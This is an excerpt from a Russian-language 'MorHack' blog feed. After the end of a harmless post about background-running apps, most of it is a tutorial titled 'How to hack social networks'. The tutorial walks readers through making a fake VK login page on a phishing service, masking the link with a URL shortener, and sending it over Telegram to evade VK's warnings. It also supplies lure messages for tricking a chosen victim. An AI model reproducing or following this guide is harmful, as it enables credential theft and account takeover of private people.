    &lt;img src=&quot;https://teletype.in/files/ce/97/ce97c331-a363-4c66-934a-48c6929dbfb7.png&quot; width=&quot;550&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Дело в том, что большинство любимых ваших программ могут работать в фоне - вы их вроде как бы и закрыли, но на самом деле, они работают. Таким образом работают такие программы, как Вконтакте, Telegram, Одноклассники и подобные.&lt;/p&gt;
  &lt;blockquote&gt;Да, эти программы за вами следят. Точнее, они следят за вашим профилем в соц. сетях, присылая вам сообщения о том, что сейчас происходит у вас на странице.&lt;/blockquote&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/46/5e/465e0ff8-9546-467e-8e48-e507e23092b5.png&quot; width=&quot;729&quot; /&gt;
    &lt;figcaption&gt;MorHack&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Однако, если обнаружить такое странное поведение у другого приложения (например, зачем тому же Clean Master это делать) то это первый повод задуматься - может быть, это приложение нежелательное к использованию, либо это приложение - не настоящее.&lt;/p&gt;
  &lt;p&gt;С вами был MorHack, не прощаемся!&lt;/p&gt;

</content></entry><entry><id>morhack:4PfwnkGMF</id><link rel="alternate" type="text/html" href="https://teletype.in/@morhack/4PfwnkGMF?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=morhack"></link><title>Как взломать социальные сети? (ВК, Instagram, Facebook)</title><published>2020-10-15T14:44:38.043Z</published><updated>2020-10-15T14:44:38.043Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/2a/24/2a24e8c2-5671-46cd-8e6c-a8b516ecf9ec.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/4d/3a/4d3af676-05f7-4d34-bad7-dbd29464fc02.png&quot;&gt;Самый популярный запрос, обращенный ко мне - &quot;взломай контакт {любая жертва: девушка/парень/руководитель}&quot;. Весь директ завален такого рода сообщениями. Настало время дать Вам самим пощупать эту технологию и опробовать ее в реальности. В силу обладания повышенных навыков программирования, такого рода деятельность для меня является уже примитивной и не интересной, а для Вас, пока юных дарквеберов, является отличным стартом. Взламывать страничку каждого, кто требует этого, слишком энергозатратно и не красиво. Вдруг тот, кого просят взломать - ни в чем не винный человек, на которого плетут интриги, или же твой подписчик. В последнем случае, это противоречит моим внутренним моральным принципам. &quot;Cвоих не бросаем&quot;. Так что, уж лучше...</summary><content type="html">
  &lt;p&gt;Самый популярный запрос, обращенный ко мне - &amp;quot;взломай контакт {любая жертва: девушка/парень/руководитель}&amp;quot;. Весь директ завален такого рода сообщениями. Настало время дать Вам самим пощупать эту технологию и опробовать ее в реальности. В силу обладания повышенных навыков программирования, такого рода деятельность для меня является уже примитивной и не интересной, а для Вас, пока юных дарквеберов, является отличным стартом. Взламывать страничку каждого, кто требует этого, слишком энергозатратно и не красиво. Вдруг тот, кого просят взломать - ни в чем не винный человек, на которого плетут интриги, или же твой подписчик. В последнем случае, это противоречит моим внутренним моральным принципам. &amp;quot;Cвоих не бросаем&amp;quot;. Так что, уж лучше забирайте технологию взлома и делайте с ней, что угодно.&lt;/p&gt;
  &lt;p&gt;Далее описываемый мною алгоритм действий не подразумевает собой создание специальных сайтов с нуля, а дает ознакомиться с уже существующим &amp;quot;дарквеб-сервисом&amp;quot;, который решит вашу проблему взлома.&lt;/p&gt;
  &lt;p&gt;Существует множество различных способов взлома, например:&lt;/p&gt;
  &lt;p&gt;- Фишинг&lt;br /&gt;- Брутинг&lt;br /&gt;- Социальная инженерия&lt;/p&gt;
  &lt;p&gt;В данной статье я &lt;strong&gt;обучаю работе именно с фишингом.&lt;/strong&gt; Он является одним из самых легких, простых и доступных способов. Суть заключается в том, что мы отправляем нашей жертве ссылку на фейковый сайт регистрации ВКонтакте (дизайн совпадает с реальным Вконтакте). Далее под каким-либо предлогом (зависит от креативности, контекста и случая письма) жертва переходит по ссылке, вводит логин и пароль, которые после этого падают нам на сайт. Называется эта деятельность фишингом не с проста. Слово &amp;quot;фишинг&amp;quot; в переводе на английский означает &amp;quot;рыбачить&amp;quot;. Здесь все подобно рыболовству. Ты сначала делаешь приманку, а потом бросаешь ее в воду, в ожидании того, что рыба клюнет.&lt;/p&gt;
  &lt;p&gt;Поймаем рыбку на нашу приманку?&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;1 ЭТАП. ИЗГОТАВЛИВАЕМ ПРИМАНКУ.&lt;/strong&gt;&lt;br /&gt;Взламывать вы сможете даже с телефона, никакого труда это не составит.&lt;/p&gt;
  &lt;p&gt;1. Заходим на сайт &lt;a href=&quot;https://www.sniff4u.ru/&quot; target=&quot;_blank&quot;&gt;https://www.sniff4u.ru/&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/4d/3a/4d3af676-05f7-4d34-bad7-dbd29464fc02.png&quot; width=&quot;715&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;2. Проходим регистрацию.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/2b/72/2b72a4af-c6d2-4155-b440-948895ff9995.png&quot; width=&quot;720&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;3. После регистрации заходим в личный кабинет и нажимаем кнопку “Фейк-ссылки”.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/14/32/1432c893-5c50-4938-92fb-4a84e26df6bf.png&quot; width=&quot;725&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;4. Теперь выбираем что именно вы хотите взломать.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/ea/4e/ea4ea13a-0c61-4c43-a70d-b8b5c8a23e1f.png&quot; width=&quot;286.5&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В нашем случае это Вконтакте “Мобильная версия”&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/69/d6/69d6e1ac-6cac-4e79-a903-6220aaccb132.png&quot; width=&quot;292&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;5. Нажимаем создать ссылку и вуаля, фейк ссылка готова. Но эта ссылка слишком приметная, вызывает подозрения. Жертва вряд-ли перейдет по ней, ибо заподозрит что-то странное. Нам необходимо привести ее в нормальный вид.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/4f/e3/4fe33079-5326-453f-ac29-0bc3b100745a.png&quot; width=&quot;293&quot; /&gt;
    &lt;figcaption&gt;Перед созданием ссылки, надо не забывать указать ссылку на страницу, куда человек перейдет после ввода своего логина и пароля. В случае, если это страница ВК, можно указать страницу Павла Дурова -https://vk.com/durov&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;6. Вставляем эту ссылку на сайте &lt;a href=&quot;https://bitly.com/&quot; target=&quot;_blank&quot;&gt;https://bitly.com/&lt;/a&gt; (укротитель ссылок) и нажимаем “Shorten”. Этим самым мы сократили ссылку, теперь она будет выглядеть более приятно.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/0b/44/0b446e2c-1808-4f48-9f41-4141b2481fe9.png&quot; width=&quot;715&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;7. Копируем ссылку, которая у нас получилась и отправляем тому, кого хотим взломать. Он попадает на фейк страницу авторизации.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/a0/93/a093058e-fb0d-48f2-b830-e1f851ff1ca3.png&quot; width=&quot;720&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;После того как жертва введёт свои данные по этой ссылке, они появятся у нас в личном кабинете.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/0c/46/0c4611c1-806c-4a8b-8d2a-9db2a860cbb8.png&quot; width=&quot;718.5&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Есть один нюанс. Ссылку необходимо отправлять через мессенджеры, которые не предупреждают о переходах на подозрительные сайты, например Телеграм. Если отправлять ссылку через Вконтакте, то он будет уведомлять о переходе на подозрительный сайт.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;2 ЭТАП. ЗАКИДЫВАЕМ УДОЧКУ.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Мы приготовили приманку, осталось отправить ссылку нашей жертве, заранее продумав легенду. Успех легенды зависит от количества креативной щепотки в вашей голове. Ограничение только в вашей фантазии. Вот самые банальные примеры:&lt;/p&gt;
  &lt;p&gt;- &amp;quot;Зайди в ВК через эту ссылку, тут бесплатная раздача стикеров&amp;quot;&lt;/p&gt;
  &lt;p&gt;- &amp;quot;Бро у меня что-то в контакт не заходит через браузер, сто раз пытаюсь, можешь глянуть, вот ссылка ..., у тебя работает или нет? &amp;quot;&lt;/p&gt;
  &lt;p&gt;В общем способов куча, если подойдете с должной серьезностью и креативом, у вас обязательно всё получится!&lt;/p&gt;
  &lt;p&gt;С вами был MorHack, не прощаемся!&lt;/p&gt;

</content></entry></feed>